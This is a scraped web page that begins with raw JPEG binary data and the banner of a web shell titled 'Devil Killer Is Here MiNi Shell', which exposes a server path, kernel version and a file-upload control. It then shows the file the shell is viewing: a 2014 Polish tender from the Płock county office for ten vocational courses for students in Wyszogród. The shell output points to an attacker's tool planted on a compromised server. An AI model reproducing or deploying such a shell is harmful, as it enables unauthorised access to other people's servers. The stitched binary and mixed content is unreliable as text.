JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141008/212663-N-2014.html

<p class="kh_header"><b>Płock: Przeprowadzenie kursów i szkoleń zawodowych dla uczniów Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie w ramach projektu Mam zawód - mam pracę</b><br>
<b>Numer ogłoszenia: 212663 - 2014; data zamieszczenia: 08.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Płocku , ul. Bielska 59, 09-400 Płock, woj. mazowieckie, tel. 024 2676777, faks 024 2676848.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat.plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów i szkoleń zawodowych dla uczniów Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie w ramach projektu Mam zawód - mam pracę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przeprowadzenie kursów i szkoleń zawodowych dla uczniów Zespołu Szkół im. Jana Śniadeckiego  w Wyszogrodzie w ramach projektu Mam zawód, mam pracę współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
Część 1 - Realizacja kursu Kelner,
Część 2 - Realizacja szkolenia Budowa i diagnostyka układów klimatyzacji,
Część 3 - Realizacja szkolenia Diagnostyka w praktyce z wykorzystaniem testera KTS i oscyloskopu,
Część 4 - Realizacja szkolenia Podstawy diagnostyki układów elektrycznych,
Część 5 - Realizacja szkolenia Budowa i diagnostyka silników o ZI,
Część 6 - Realizacja kursu Carving,
Część 7 - Realizacja szkolenia Diagnostyka silnika z zapłonem iskrowym  z wykorzystaniem analizatora spalin,
Część 8 - Realizacja szkolenia Budowa elementów układu kierowniczego,
Część 9 - Realizacja szkolenia Diagnostyka i naprawa układów bezpieczeństwa biernego i czynnego,
Część 10 - Realizacja kursu Techniki Kulinarne.
2.  Zamówienie należy zrealizować zgodnie z opisem przedmiotu zamówienia, który szczegółowo został określony w załączniku nr 1-10 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (wzór zał. nr 12).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (wzór zał. nr 12).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia - Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (wzór zał. nr 12).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający żąda by Wykonawca  wykazał, że dysponuje co najmniej 1 osobą zdolną do wykonania zamówienia, która posiada:
Dotyczy części 1: Realizacja  kursu Kelner
-  wykształcenie co najmniej średnie,
-  doświadczenie w prowadzeniu kursów dla kelnerów - należy wykazać przeprowadzenie co najmniej 1 kursu,
- co najmniej 3 letnie doświadczenie zawodowe związane z przedmiotem zamówienia  tj. praca na stanowisku kelnera i/lub prowadzenie kursów/szkoleń pn. Kelner i/lub prowadzenie zajęć w szkole z przedmiotu zawodowego związanego charakterem w/w kursu w ostatnich 5 latach przed terminem upływu składania ofert.

Dotyczy części 2 - Realizacja szkolenia Budowy i diagnostyka układów klimatyzacji
-  wykształcenie co najmniej średnie,
- przygotowanie pedagogiczne (studia wyższe, studia podyplomowe, studium, kurs    kwalifikacyjny) lub ukończony kurs instruktora praktycznej nauki zawodu,
-  doświadczenie w prowadzeniu kursów/szkoleń należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia o tematyce tożsamej lub zbliżonej do tematyki w/w szkolenia lub doświadczenie w prowadzeniu zajęć w szkole ponadgimnazjalnej - należy wykazać przeprowadzenie co najmniej 10 godzin zajęć z przedmiotu zawodowego związanego z zakresem szkolenia lub zbliżonego do zakresu szkolenia.

Dotyczy części 3 - Realizacja szkolenia Diagnostyka w praktyce z wykorzystaniem testeru KTS i oscyloskopu
-  wykształcenie co najmniej średnie,
- przygotowanie pedagogiczne (studia wyższe, studia podyplomowe, studium, kurs    kwalifikacyjny) lub ukończony kurs instruktora praktycznej nauki zawodu,
-  doświadczenie w prowadzeniu kursów/szkoleń należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia z w/w zakresu lub doświadczenie w prowadzeniu zajęć w szkole ponadgimnazjalnej - należy wykazać przeprowadzenie co najmniej 10 godzin zajęć z przedmiotu zawodowego związanego z zakresem szkolenia.

 Dotyczy części 4 - Realizacja szkolenia Podstawy diagnostyki układów elektrycznych 
-  wykształcenie co najmniej średnie,
- przygotowanie pedagogiczne (studia wyższe, studia podyplomowe, studium, kurs    kwalifikacyjny) lub ukończony kurs instruktora praktycznej nauki zawodu,
-  doświadczenie w prowadzeniu kursów/szkoleń należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia o tematyce tożsamej lub zbliżonej do tematyki w/w szkolenia lub doświadczenie w prowadzeniu zajęć w szkole ponadgimnazjalnej - należy wykazać przeprowadzenie co najmniej 10 godzin zajęć z przedmiotu zawodowego związanego z zakresem szkolenia lub zbliżonego do zakresu szkolenia.

Dotyczy części 5 - Realizacja szkolenia Budowa i diagnostyka silników o ZI
-  wykształcenie co najmniej średnie,
- przygotowanie pedagogiczne (studia wyższe, studia podyplomowe, studium, kurs    kwalifikacyjny) lub ukończony kurs instruktora praktycznej nauki zawodu,
-  doświadczenie w prowadzeniu kursów/szkoleń należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia o tematyce tożsamej lub zbliżonej do tematyki w/w szkolenia lub doświadczenie w prowadzeniu zajęć w szkole ponadgimnazjalnej - należy wykazać przeprowadzenie co najmniej 10 godzin zajęć z przedmiotu zawodowego związanego z zakresem szkolenia lub zbliżonego do zakresu szkolenia.

Dotyczy części 6 - Realizacja kursu Carving
-  wykształcenie co najmniej średnie,
-  doświadczenie w prowadzeniu kursów/szkoleń Carving - należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia o tej tematyce w ostatnich 3 latach przed upływem terminu składania ofert.

Dotyczy części 7 - Realizacja szkolenia Diagnostyka silnika z zapłonem iskrowym z wykorzystaniem analizatora spalin
-  wykształcenie co najmniej średnie,
- przygotowanie pedagogiczne (studia wyższe, studia podyplomowe, studium, kurs    kwalifikacyjny) lub ukończony kurs instruktora praktycznej nauki zawodu,
-  doświadczenie w prowadzeniu kursów/szkoleń należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia o tematyce tożsamej lub zbliżonej do tematyki w/w szkolenia lub doświadczenie w prowadzeniu zajęć w szkole ponadgimnazjalnej - należy wykazać przeprowadzenie co najmniej 10 godzin zajęć z przedmiotu zawodowego związanego z zakresem szkolenia lub zbliżonego do zakresu szkolenia.

Dotyczy części 8 - Realizacja szkolenia Budowa elementów układu kierowniczego 
-  wykształcenie co najmniej średnie,
- przygotowanie pedagogiczne (studia wyższe, studia podyplomowe, studium, kurs    kwalifikacyjny) lub ukończony kurs instruktora praktycznej nauki zawodu,
-  doświadczenie w prowadzeniu kursów/szkoleń należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia o tematyce tożsamej lub zbliżonej do tematyki w/w szkolenia lub doświadczenie w prowadzeniu zajęć w szkole ponadgimnazjalnej - należy wykazać przeprowadzenie co najmniej 10 godzin zajęć z przedmiotu zawodowego związanego z zakresem szkolenia lub zbliżonego do zakresu szkolenia.

Dotyczy części  9 - Realizacja szkolenia Diagnostyka i naprawa układów bezpieczeństwa biernego i czynnego
-  wykształcenie co najmniej średnie,
- przygotowanie pedagogiczne (studia wyższe, studia podyplomowe, studium, kurs    kwalifikacyjny) lub ukończony kurs instruktora praktycznej nauki zawodu,
-  doświadczenie w prowadzeniu kursów/szkoleń należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia o tematyce tożsamej lub zbliżonej do tematyki w/w szkolenia lub doświadczenie w prowadzeniu zajęć w szkole ponadgimnazjalnej - należy wykazać przeprowadzenie co najmniej 10 godzin zajęć z przedmiotu zawodowego związanego z zakresem szkolenia lub zbliżonego do zakresu szkolenia.

Dotyczy części  10 - Realizacja kursu Techniki Kulinarne
-  wykształcenie co najmniej średnie,
- przygotowanie pedagogiczne (studia wyższe, studia podyplomowe, studium, kurs    kwalifikacyjny) lub ukończony kurs instruktora praktycznej nauki zawodu,
-  doświadczenie w prowadzeniu kursów/szkoleń należy wykazać przeprowadzenie co najmniej 1 kursu/szkolenia o tematyce tożsamej lub zbliżonej do tematyki w/w kursu lub doświadczenie w prowadzeniu zajęć w szkole ponadgimnazjalnej - należy wykazać przeprowadzenie co najmniej 10 godzin zajęć z przedmiotu zawodowego związanego z zakresem w/w kursu lub zbliżonego do zakresu kursu.

W celu potwierdzenia, że Wykonawca dysponuje odpowiednimi osobami zdolnymi do wykonywania zamówienia, do oferty należy dołączyć następujące dokumenty:

1) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz  z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami / z wykorzystaniem wzoru - załącznik nr 13.

Zgodnie z art. 26 ust 2b Pzp, Wykonawca może polegać na potencjale technicznym i osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonywaniu zamówienia.
W przypadku pisemnego zobowiązania podmiotu trzeciego do udostępnienia zasobów należy załączyć je w oryginale.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (wzór zał. nr 12).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty - załącznik nr 11  do SIWZ,
2. Pełnomocnictwo (oryginał lub kopia poświadczona notarialnie) jeżeli oferta będzie podpisana przez pełnomocnika</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ustawy PZP, Zamawiający dopuszcza zmiany umowy w zakresie: 
- przypadków losowych, które będą miały wpływ na treść zawartej umowy i termin realizacji,
- zmiany terminu w harmonogramie realizacji projektu, w ramach którego umowa jest realizowana, co będzie miało wpływ na zmianę terminu obowiązywania niniejszej umowy,
- Zmiany osób, które będą uczestniczyć w wykonaniu zamówienia, jeżeli zmiany są korzystne dla Zamawiającego lub wywołane okolicznościami, których nie można było przewidzieć w chwili zawarcia umowy,
2. Do zmiany osoby uczestniczącej w wykonaniu zamówienia wymagane jest łączne spełnienie następujących warunków:
a)przedstawienie osoby, której kwalifikacje zawodowe, doświadczenie, wykształcenie nie są niższe niż osoby zastępowanej, 
b)złożenie informacji na temat kwalifikacji zawodowych, doświadczenia, wykształcenia liczby godzin oraz informacji o podstawie do dysponowania tą osobą,
c) uzyskanie przez Wykonawcę uprzedniej zgody Zamawiającego na zmianę osoby uczestniczącej    w wykonaniu zamówienia.
- zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, zmiany będące następstwem działania organów administracji.
3. Wszelkie zmiany i uzupełnienia umowy wymagają akceptacji obu stron i formy pisemnego aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP : http://www.bip.powiat-plock.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Płocki - Starostwo Powiatowe w Płocku, ul. Bielska 59, 09-400 Płock, p.422 - IV piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2014 godzina 10:30, miejsce: Powiat Płocki - Starostwo Powiatowe w Płocku, ul. Bielska 59, 09-400 Płock, Kancelaria Ogólna p. 211 - II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Mam zawód - mam pracę współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja kursu Kelner.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 grupy szkoleniowe po 10 osób uczniów Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie, ul. Niepodległości 11.
2.Termin realizacji: styczeń 2015r. - luty 2015r.
3.Szczegółowy harmonogram:
-20 godzin dla 1 grupy, łącznie dla dwóch grup 40 godzin,
-4 spotkania po 5 godzin dla jednej grupy, dla dwóch grup 8 spotkań po 5 godzin (1 godzina = 45 min),
-realizacja w dni wolne od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 17.00),
-Wykonawca zapewni w każdym dniu prowadzenia zajęć przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia:
a)jak być dobrym kelnerem - wprowadzenie do zawodu kelnera, ubiór i wizerunek kelnera i kelnerki,
b) prezentacja zastawy stołowej:
- prezentacja najważniejszych elementów zastawy stołowej i sztućców (sztuka układania sztuców);
c)dekoracja stołów w zależności od rodzaju imprezy,
d) zasady obsługi konsumenta: powitanie, serwis, podziękowanie i pożegnanie,
e)podawanie rachunku, metody serwowania, kolejność podawania potraw i napojów, prezentacja i podawanie napojów alkoholowych;
f)zasady przygotowania deserów w obecności konsumenta - flambrowanie,
g)zarys organizacji bankietów.
Tematy teoretyczne powinny być podparte odpowiednimi zajęciami praktycznymi m.in.:
a)nakrywanie stołów - układ podstawowy i elegancki - (sposoby składnia i rozkładania obrusów, zmiana obrusów w obecności konsumenta),
b)sztuka układania serwetek (sposoby układania serwetek - na leżąco i stojąco w zależności od rodzaju serwowanych dań).
c)ćwiczenia z noszenia zastawy stołowej, szkła oraz tac, zasady zbierania zastawy stołowej po konsumpcji,
d)ćwiczenia z zakresu serwowania.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom na czas realizacji kursu niezbędnego sprzętu, materiałów szkoleniowych oraz wszelkich produktów potrzebnych do realizacji kursu w części teoretycznej i praktycznej w ilości zapewniającej wszystkim uczestnikom kursu wykonanie ćwiczeń w pełnym zakresie zgodnie ze wskazanym programem, w tym w szczególności różnorodnych produktów tj. zastawy stołowe, serwetki, tace, obrusy.
-Zapewnienie uczestnikom kursu materiałów dydaktycznych niezbędnych do utrwalenia wiadomości - mogą to być np. kserokopie streszczeń wykładów, długopis, notatnik. Wszystkie te materiały muszą być przygotowane i rozdane uczestnikom szkolenia najpóźniej w pierwszym dniu zajęć. Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć dla każdej grupy.
-Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i zaświadczeniach, certyfikatach. 
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
-Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa i higieny pracy,
- Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
-  prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń o ukończeniu kursu Kelner,
- zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - w każdym dniu prowadzenia zajęć zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
